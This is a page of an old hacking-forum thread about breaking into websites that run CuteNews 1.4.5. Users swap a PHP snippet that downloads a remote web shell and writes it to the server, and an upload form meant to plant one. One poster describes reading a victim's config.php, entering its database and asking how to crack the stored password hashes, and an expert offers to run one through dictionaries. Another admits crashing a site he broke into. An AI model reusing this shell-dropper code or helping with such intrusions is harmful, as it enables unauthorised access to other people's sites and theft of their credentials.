Waraxe IT Security Portal
Login or Register
September 8, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 83
Members: 0
Total: 83
Full disclosure
[SYSS-2024-030]: C-MOR Video Surveillance - OS Command Injection (CWE-78)
[SYSS-2024-029]: C-MOR Video Surveillance - Dependency on Vulnerable Third-Party Component (CWE-1395)
[SYSS-2024-028]: C-MOR Video Surveillance - Cleartext Storage of Sensitive Information (CWE-312)
[SYSS-2024-027]: C-MOR Video Surveillance - Improper Privilege Management (CWE-269)
[SYSS-2024-026]: C-MOR Video Surveillance - Unrestricted Upload of File with Dangerous Type (CWE-434)
[SYSS-2024-025]: C-MOR Video Surveillance - Relative Path Traversal (CWE-23)
Backdoor.Win32.Symmi.qua / Remote Stack Buffer Overflow (SEH)
HackTool.Win32.Freezer.br (WinSpy) / Insecure CredentialStorage
Backdoor.Win32.Optix.02.b / Weak Hardcoded Credentials
Backdoor.Win32.JustJoke.2 1 (BackDoor Pro) / Unauthenticated Remote Command Execution
Backdoor.Win32.PoisonIvy. ymw / Insecure Credential Storage
[SYSS-2024-024]: C-MOR Video Surveillance - Improper Access Control (CWE-284)
[SYSS-2024-023]: C-MOR Video Surveillance - SQL Injection(CWE-89)
[SYSS-2024-022]: C-MOR Video Surveillance - Cross-Site Request Forgery (CWE-352)
[SYSS-2024-021]: C-MOR Video Surveillance - Persistent Cross-Site Scripting (CWE-79)
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> All other software -> Cutenews 1.4.5 Goto page Previous1, 2
Post new topicReply to topic View previous topic :: View next topic
PostPosted: Tue Aug 19, 2008 4:58 pm Reply with quote
xxxmystikxxx
Regular user
Regular user
Joined: Aug 17, 2008
Posts: 8
Location: C:/Lineage2/system/l2.exe




i find this in google
$file = file_get_contents('url to yor shell');
$brd = fopen('file2.php','w+');
$write = fwrite($brd, $file);
i insert it and see his config.php then connet to his database.
And now a question: How to decode accounts passwords?
View user's profile Send private message
PostPosted: Wed Aug 20, 2008 2:45 pm Reply with quote
xxxmystikxxx
Regular user
Regular user
Joined: Aug 17, 2008
Posts: 8
Location: C:/Lineage2/system/l2.exe




for example how to decode this RDkMcWDQld3vxLdlVnsHLGRhJ5Y=
View user's profile Send private message
PostPosted: Wed Aug 20, 2008 9:17 pm Reply with quote
lenny
Valuable expert
Valuable expert
Joined: May 15, 2008
Posts: 275




http://makcoder.sourceforge.net/demo/base64.php Smile
View user's profile Send private message
PostPosted: Thu Aug 21, 2008 6:24 am Reply with quote
xxxmystikxxx
Regular user
Regular user
Joined: Aug 17, 2008
Posts: 8
Location: C:/Lineage2/system/l2.exe




lenny wrote:
http://makcoder.sourceforge.net/demo/base64.php Smile

idoesnt decode this because it is base64 decoder but i need SHA-1(base64)
View user's profile Send private message
PostPosted: Fri Aug 22, 2008 1:42 pm Reply with quote
lenny
Valuable expert
Valuable expert
Joined: May 15, 2008
Posts: 275




oh ok, well in that case you need to submit it in the hash cracking forum. I will run it through my dictionaries now though Smile
View user's profile Send private message
PostPosted: Sat Aug 30, 2008 3:56 am Reply with quote
Romi
Beginner
Beginner
Joined: Apr 06, 2008
Posts: 3




xxxmystikxxx wrote:
i find this in google
$file = file_get_contents('url to yor shell');
$brd = fopen('file2.php','w+');
$write = fwrite($brd, $file);


Hey, m8!
Can you explain me pls, how can i insert this code in template?
I have try upload form but is not work...
this is the form code:
Code:

<form enctype="multipart/form-data" method=POST >
<input type=hidden name=MAX_FILE_SIZE value=1024000>Send this file:
<input name=userfile type=file>
<input type=submit value="Send File"></form>
<?php if(!empty($_FILES[userfile][tmp_name])){
if(move_uploaded_file($_FILES[userfile][tmp_name],"data/upimages/".$_FILES[userfile][name])){
echo "<br> <br> fFile Uploaded ";}}
?>

but dosn't work ,can anyone help me?

P.S.
I have try simple code = phpinfo(); in template
not work too, some sugestion?
View user's profile Send private message
PostPosted: Sat Aug 30, 2008 5:12 pm Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Read whole thread. Laughing
View user's profile Send private message
PostPosted: Sat Aug 30, 2008 10:13 pm Reply with quote
Romi
Beginner
Beginner
Joined: Apr 06, 2008
Posts: 3




koko wrote:
Read whole thread. Laughing


OK. m8, i have read all thread about cutenews 1.4.5 and i can't find nothing...

I have try all solution, nothing...
Have more 8 domain account and passw.., but i cant insert shell...

i have try in more domain, and nothing....
PHP code is not work in template...
Some domain are patched from "Napas", may be this patch is not vulnerable to shell?

I have try with immage too = nothing...

Give me an idea man, if you can....
Thx in advance.....
View user's profile Send private message
PostPosted: Thu Jun 04, 2009 10:10 pm Reply with quote
JasonB
Regular user
Regular user
Joined: Apr 05, 2009
Posts: 23




Hmm, I followed the advice here but it doesn't seem to work.

I get a parsing error if I try to put php into the template, I can get phpinfo to display but I'm lost for what to do now..
View user's profile Send private message
PostPosted: Sat Sep 12, 2009 4:59 am Reply with quote
bizzumbottom
Active user
Active user
Joined: Sep 09, 2009
Posts: 27




So I have access, but .tpl templates can't execute php code.

So the other two choices are to inject code via creating a new user, or changing config.php

Either way, how would I do so properly? I already crashed the last CuteNews site I got into.
View user's profile Send private message
Cutenews 1.4.5
www.waraxe.us Forum Index -> All other software
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 2 of 2
Goto page Previous1, 2
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.132 Seconds